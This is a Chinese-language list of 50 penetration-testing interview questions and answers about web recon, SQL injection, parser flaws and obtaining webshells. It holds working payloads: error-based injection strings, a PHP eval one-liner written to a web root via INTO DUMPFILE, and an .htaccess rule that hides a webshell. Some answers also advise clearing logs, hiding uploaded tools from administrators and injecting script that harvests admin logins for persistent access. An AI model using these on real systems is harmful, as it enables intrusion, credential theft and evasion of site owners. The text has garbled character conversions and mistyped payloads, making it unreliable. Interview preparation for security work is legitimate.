50條滲透測試崗面試題

50條滲透測試崗面試題

　1.拿到一個待檢測的站，你以爲應該先作什麼？

　　1)信息收集

　　1，獲取域名的whois信息,獲取註冊者郵箱姓名電話等。

　　2，查詢服務器旁站以及子域名站點，由於主站通常比較難，因此先看看旁站有沒有通用性的cms或者其餘漏洞。

　　3，查看服務器操做系統版本，web中間件，看看是否存在已知的漏洞，好比IIS，APACHE,NGINX的解析漏洞

　　4，查看IP，進行IP地址端口掃描，對響應的端口進行漏洞探測，好比 rsync,心臟出血，mysql,ftp,ssh弱口令等。

　　5，掃描網站目錄結構，看看是否能夠遍歷目錄，或者敏感文件泄漏，好比php探針

　　6，google hack 進一步探測網站的信息，後臺，敏感文件

　　2）漏洞掃描

　　開始檢測漏洞，如XSS,XSRF,sql注入，代碼執行，命令執行，越權訪問，目錄讀取，任意文件讀取，下載，文件包含，

　　遠程命令執行，弱口令，上傳，編輯器漏洞，暴力破解等

　　3）漏洞利用

　　利用以上的方式拿到webshell，或者其餘權限

　　4）權限提高

　　提權服務器，好比windows下mysql的udf提權，serv-u提權，windows低版本的漏洞，如iis6,pr,巴西烤肉，linux髒牛漏洞，linux內核版本漏洞提權，linux下的mysql system提權以及oracle低權限提權

　　5) 日誌清理

　　6）總結報告及修復方案

　　2.判斷出網站的CMS對滲透有什麼意義？

　　查找網上已曝光的程序漏洞。

　　若是開源，還能下載相對應的源碼進行代碼審計。

　　3.一個成熟而且相對安全的CMS，滲透時掃目錄的意義？

　　敏感文件、二級目錄掃描

　　站長的誤操做好比：網站備份的壓縮文件、說明.txt、二級目錄可能存放着其餘站點

　　4.常見的網站服務器容器。

　　IIS、Apache、nginx、Lighttpd、Tomcat

　　5.mysql注入點，用工具對目標站直接寫入一句話，須要哪些條件？

　　root權限以及網站的絕對路徑。

　　6.目前已知哪些版本的容器有解析漏洞，具體舉例。

　　IIS 6.0

　　/xx.asp/xx.jpg 「xx.asp」是文件夾名

　　IIS 7.0/7.5

　　默認Fast-CGI開啓，直接在url中圖片地址後面輸入/1.php，會把正常圖片當成php解析

　　Nginx

　　版本小於等於0.8.37，利用方法和IIS 7.0/7.5同樣，Fast-CGI關閉狀況下也可利用。

　　空字節代碼 xxx.jpg.php

　　Apache

　　上傳的文件命名爲：test.php.x1.x2.x3，Apache是從右往左判斷後綴

　　lighttpd

　　xx.jpg/xx.php，不全,請小夥伴們在評論處不吝補充，謝謝！

　　7.如何手工快速判斷目標站是windows仍是linux服務器？

　　linux大小寫敏感,windows大小寫不敏感。

　　8.爲什麼一個mysql數據庫的站，只有一個80端口開放？

　　更改了端口，沒有掃描出來。

　　站庫分離。

　　3306端口不對外開放

　　9.沒法鏈接3389的幾種狀況

　　沒開放3389 端口

　　端口被修改

　　防禦攔截

　　處於內網(需進行端口轉發)

　　10.如何突破注入時字符被轉義？

　　寬字符注入

　　hex編碼繞過

　　11.在某後臺新聞編輯界面看到編輯器，應該先作什麼？

　　查看編輯器的名稱版本,而後搜索公開的漏洞。

　　12.拿到一個webshell發現網站根目錄下有.htaccess文件，咱們能作什麼？

　　能作的事情不少，用隱藏網馬來舉例子：

　　插入

　　SetHandler application/x-httpd-php

　　.jpg文件會被解析成.php文件。

　　具體其餘的事情，很差詳說，建議你們本身去搜索語句來玩玩。

　　13.注入漏洞只能查帳號密碼？

　　只要權限廣，拖庫脫到老。

　　14.安全狗會追蹤變量，從而發現出是一句話木馬嗎？

　　是根據特徵碼，因此很好繞過了，只要思路寬，繞狗繞到歡，但這應該不會是一成不變的。

　　15.access 掃出後綴爲asp的數據庫文件，訪問亂碼，**如何實現到本地利用？**

　　迅雷下載，直接改後綴爲.mdb。

　　16.提權時選擇可讀寫目錄，爲什麼儘可能不用帶空格的目錄？

　　由於exp執行多半須要空格界定參數

　　17.某服務器有站點A,B 爲什麼在A的後臺添加test用戶，訪問B的後臺。發現也添加上了test用戶？

　　同數據庫。

　　18.注入時能夠不使用and 或or 或xor，直接order by 開始注入嗎？

　　and/or/xor，前面的1=一、1=2步驟只是爲了判斷是否爲注入點，若是已經肯定是注入點那就能夠省那步驟去。

　　19:某個防注入系統，在注入時會提示：

　　系統檢測到你有非法注入的行爲。

　　已記錄您的ip xx.xx.xx.xx

　　時間:2016:01-23

　　提交頁面:test.asp id=15

　　提交內容:and 1=1

　　20、如何利用這個防注入系統拿shell？

在URL裏面直接提交一句話，這樣網站就把你的一句話也記錄進數據庫文件了 這個時候能夠嘗試尋找網站的配置文件 直接上菜刀連接。

　　21.上傳大馬後訪問亂碼時，有哪些解決辦法？

　　瀏覽器中改編碼。

　　22.審查上傳點的元素有什麼意義？

　　有些站點的上傳文件類型的限制是在前端實現的，這時只要增長上傳類型就能突破限制了。

　　23.目標站禁止註冊用戶，找回密碼處隨便輸入用戶名提示：「此用戶不存在」，你以爲這裏怎樣利用？

　　先爆破用戶名，再利用被爆破出來的用戶名爆破密碼。

　　其實有些站點，在登錄處也會這樣提示

　　全部和數據庫有交互的地方都有可能有注入。

　　24.目標站發現某txt的下載地址爲http://www.test.com/down/down.php file=/upwdown/1.txt，你有什麼思路？

　　這就是傳說中的下載漏洞！在file=後面嘗試輸入index.php下載他的首頁文件，而後在首頁文件裏繼續查找其餘網站的配置文件，能夠找出網站的數據庫密碼和數據庫的地址。

　　25.甲給你一個目標站，而且告訴你根目錄下存在/abc/目錄，而且此目錄下存在編輯器和admin目錄。請問你的想法是？

　　直接在網站二級目錄/abc/下掃描敏感文件及目錄。

　　26.在有shell的狀況下，如何使用xss實現對目標站的長久控制？

　　後臺登陸處加一段記錄登陸帳號密碼的js，而且判斷是否登陸成功，若是登陸成功，就把帳號密碼記錄到一個生僻的路徑的文件中或者直接發到本身的網站文件中。(此方法適合有價值而且須要深刻控制權限的網絡)。

　　在登陸後才能夠訪問的文件中插入XSS腳本。

　　27.後臺修改管理員密碼處，原密碼顯示爲*。你以爲該怎樣實現讀出這個用戶的密碼？

　　審查元素 把密碼處的password屬性改爲text就明文顯示了

　　28.目標站無防禦，上傳圖片能夠正常訪問，上傳腳本格式訪問則403.什麼緣由？

　　緣由不少，有可能web服務器配置把上傳目錄寫死了不執行相應腳本，嘗試改後綴名繞過

　　29.審查元素得知網站所使用的防禦軟件，你以爲怎樣作到的？

　　在敏感操做被攔截，經過界面信息沒法具體判斷是什麼防禦的時候，F12看HTML體部 好比護衛神就能夠在名稱那看到內容。

　　30.在win2003服務器中創建一個 .zhongzi文件夾用意何爲？

　　隱藏文件夾，爲了避免讓管理員發現你傳上去的工具。

　　3一、sql注入有如下兩個測試選項，選一個而且闡述不選另外一個的理由：

　　A. demo.jsp id=2+1 B. demo.jsp id=2-1

　　選B，在 URL 編碼中 + 表明空格，可能會形成混淆

　　3二、如下連接存在 sql 注入漏洞，對於這個變形注入，你有什麼思路？

　　demo.do DATA=AjAxNg==

　　DATA有可能通過了 base64 編碼再傳入服務器，因此咱們也要對參數進行 base64 編碼才能正確完成測試

　　3三、發現 demo.jsp uid=110 注入點，你有哪幾種思路獲取 webshell，哪一種是優選？

　　有寫入權限的，構造聯合查詢語句使用using INTO OUTFILE，能夠將查詢的輸出重定向到系統的文件中，這樣去寫入 WebShell

　　使用 sqlmap –os-shell 原理和上面一種相同，來直接得到一個 Shell，這樣效率更高

　　經過構造聯合查詢語句獲得網站管理員的帳戶和密碼，而後掃後臺登陸後臺，再在後臺經過改包上傳等方法上傳 Shell

　　3四、CSRF 和 XSS 和 XXE 有什麼區別，以及修復方式？

　　XSS是跨站腳本攻擊，用戶提交的數據中能夠構造代碼來執行，從而實現竊取用戶信息等攻擊。修復方式：對字符實體進行轉義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時校驗、瀏覽器與Web應用端採用相同的字符編碼。

　　CSRF是跨站請求僞造攻擊，XSS是實現CSRF的諸多手段中的一種，是因爲沒有在關鍵操做執行時進行是否由用戶自願發起的確認。修復方式：篩選出須要防範CSRF的頁面而後嵌入Token、再次輸入密碼、檢驗Referer

　　XXE是XML外部實體注入攻擊，XML中能夠經過調用實體來請求本地或者遠程內容，和遠程文件保護相似，會引起相關安全問題，例如敏感文件讀取。修復方式：XML解析庫在調用時嚴格禁止對外部實體的解析。

　　3五、CSRF、SSRF和重放攻擊有什麼區別？

　　CSRF是跨站請求僞造攻擊，由客戶端發起

　　SSRF是服務器端請求僞造，由服務器發起

　　重放攻擊是將截獲的數據包進行重放，達到身份認證等目的

　　3六、說出至少三種業務邏輯漏洞，以及修復方式？

　　密碼找回漏洞中存在

　　1）密碼容許暴力破解、

　　2）存在通用型找回憑證、

　　3）能夠跳過驗證步驟、

　　4）找回憑證能夠攔包獲取

　　等方式來經過廠商提供的密碼找回功能來獲得密碼。

　　身份認證漏洞中最多見的是

　　1）會話固定攻擊

　　2） Cookie 仿冒

　　只要獲得 Session 或 Cookie 便可僞造用戶身份。

　　驗證碼漏洞中存在

　　1）驗證碼容許暴力破解

　　2）驗證碼能夠經過 Javascript 或者改包的方法來進行繞過

　　3七、圈出下面會話中可能存在問題的項，並標註可能會存在的問題？

　　get /ecskins/demo.jsp uid=2016031900&keyword=」hello world」

　　HTTP/1.1Host:.com:82User-Agent:Mozilla/

　　5.0 Firefox/40Accept:text/css,/;q=0.1

　　Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3

　　Referer:http://**.com/eciop/orderForCC/

　　cgtListForCC.htm zone=11370601&v=145902

　　Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;

　　uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;

　　st_uid=N90PLYHLZGJXI-NX01VPUF46W;

　　status=True

　　Connection:keep-alive

　　3八、sqlmap，怎麼對一個注入點注入？

　　1）若是是get型號，直接，sqlmap -u 「諸如點網址」.

　　2) 若是是post型諸如點，能夠sqlmap -u 「注入點網址」 –data=」post的參數」

　　3）若是是cookie，X-Forwarded-For等，能夠訪問的時候，用burpsuite抓包，注入處用號替換，放到文件裏，而後sqlmap -r 「文件地址」

　　3九、sql注入的幾種類型？

　　1）報錯注入

　　2）bool型注入

　　3）延時注入

4）寬字節注入

　　40、延時注入如何來判斷？

　　if(ascii(substr(「hello」, 1, 1))=104, sleep(5), 1)

　　4一、盲注和延時注入的共同點？

　　都是一個字符一個字符的判斷

　　4二、如何拿一個網站的webshell？

　　上傳，後臺編輯模板，sql注入寫文件，命令執行，代碼執行，

　　一些已經爆出的cms漏洞，好比dedecms後臺能夠直接創建腳本文件，wordpress上傳插件包含腳本文件zip壓縮包等

　　4三、報錯注入的函數有哪些？ 10個

　　1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】———

　　2）經過floor報錯 向下取整

　　3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

　　4）.geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));

　　5）.multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));

　　6）.polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));

　　7）.multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));

　　8）.linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));

　　9）.multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));

10）.exp()select from test where id=1 and exp(~(select * from(select user())a));

　　4四、img標籤除了onerror屬性外，還有其餘獲取管理員路徑的辦法嗎？

　　src指定一個遠程的腳本文件，獲取referer

　　4五、img標籤除了onerror屬性外，而且src屬性的後綴名，必須以.jpg結尾，怎麼獲取管理員路徑。

　　1）遠程服務器修改apache配置文件，配置.jpg文件以php方式來解析

　　AddType application/x-httpd-php .jpg

　　<img src=http://xss.tv/1.jpg> 會以php方式來解析

　　4六、sql注入寫文件都有哪些函數？

　　select ‘一句話’ into outfile ‘路徑’

　　select ‘一句話’ into dumpfile ‘路徑’

　　select ‘< php eval($_POST[1])  >’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;

　　4七、如何防止CSRF

　　1,驗證referer

　　2，驗證token

　　詳細：http://cnodejs.org/topic/5533dd6e9138f09b629674fd

　　4八、owasp 漏洞都有哪些？

　　一、SQL注入防禦方法：

　　二、失效的身份認證和會話管理

　　三、跨站腳本攻擊XSS

　　四、直接引用不安全的對象

　　五、安全配置錯誤

　　六、敏感信息泄露

　　七、缺乏功能級的訪問控制

　　八、跨站請求僞造CSRF

　　九、使用含有已知漏洞的組件

　　十、未驗證的重定向和轉發

　　4九、SQL注入防禦方法？

　　一、使用安全的API

　　二、對輸入的特殊字符進行Escape轉義處理

　　三、使用白名單來規範化輸入驗證方法

　　四、對客戶端輸入進行控制，不容許輸入SQL注入相關的特殊字符

　　五、服務器端在提交數據庫進行SQL查詢以前，對特殊字符進行過濾、轉義、替換、刪除。

　　50、代碼執行，文件讀取，命令執行的函數都有哪些？

　　1）代碼執行：

　　eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

　　2）文件讀取：

　　file_get_contents(),highlight_file(),fopen(),read

　　file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

　　3)命令執行：

　　system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()